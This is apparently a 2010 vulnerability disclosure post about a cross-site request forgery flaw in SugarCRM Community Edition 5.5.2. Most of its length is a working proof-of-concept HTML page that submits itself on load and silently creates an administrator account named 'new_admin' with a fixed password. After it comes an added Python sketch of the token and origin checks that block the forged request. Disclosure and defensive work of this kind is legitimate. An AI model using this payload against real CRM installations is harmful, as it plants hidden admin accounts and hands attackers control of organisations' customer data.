Sunday, May 30, 2010

SugarCRM Community Edition 5.5.2 Cross-site Request Forgery

A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create a new administrator account. The proof-of-concept page below submits the forged request automatically when it is loaded:

<body onload="document.forms[0].submit()">
<form method="POST" action="">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
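As an added example (not SugarCRM's own code), the following Python sketch models the server side of the Users/Save request that the page above forges, and shows the two checks that stop it: a per-session synchronizer token that only a page served by the CRM itself can know, and an Origin/Referer comparison as defence in depth. The handler name, the token field name and the origins are assumptions; the form fields are the ones used in the proof of concept.

```python
# Added example, not SugarCRM code: a synchronizer-token check for a Users/Save
# request. TOKEN_FIELD, SITE_ORIGIN and the function names are assumptions.
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

TOKEN_FIELD = "csrf_token"           # assumed name of the hidden anti-forgery field
SITE_ORIGIN = "https://crm.example"  # placeholder origin of the CRM host


def new_session():
    """Server-side session carrying a fresh, unguessable CSRF token."""
    return {"user_id": "admin", "csrf_token": secrets.token_urlsafe(32)}


def render_edit_view(session):
    """The real EditView form embeds the session token; a third-party page
    cannot read it, so it cannot build a Save request that passes the check."""
    return f'<input type="hidden" name="{TOKEN_FIELD}" value="{session["csrf_token"]}" />'


def same_origin(headers):
    """Reject requests whose browser-supplied Origin (or Referer) is another
    site or absent; this catches a forged form even if the token check regresses."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlparse(src)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN


def handle_users_save(session, headers, body):
    """Return (accepted, reason). Only a same-origin request carrying the
    session's token may reach the code that creates or modifies a user."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if form.get("module") != "Users" or form.get("action") != "Save":
        return False, "not a Users/Save request"
    if not same_origin(headers):
        return False, "cross-origin request refused"
    sent = form.get(TOKEN_FIELD, "")
    # Constant-time comparison on bytes (str operands would have to be ASCII).
    if not hmac.compare_digest(sent.encode(), session["csrf_token"].encode()):
        return False, "missing or invalid CSRF token"
    # The privilege fields from the PoC are only honoured after both checks pass.
    wants_admin = form.get("is_admin") == "1" or form.get("UserType") == "Administrator"
    return True, "admin user created" if wants_admin else "user saved"


# Constructed request body mirroring the PoC form's relevant fields (no token).
FORGED_BODY = ("module=Users&action=Save&sugar_user_name=new_admin&is_admin=1"
               "&UserType=Administrator&new_password=Password1")
```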


  1. John Leitch has discovered a vulnerability in SugarCRM, which can be exploited by malicious people to conduct cross-site request forgery attacks.
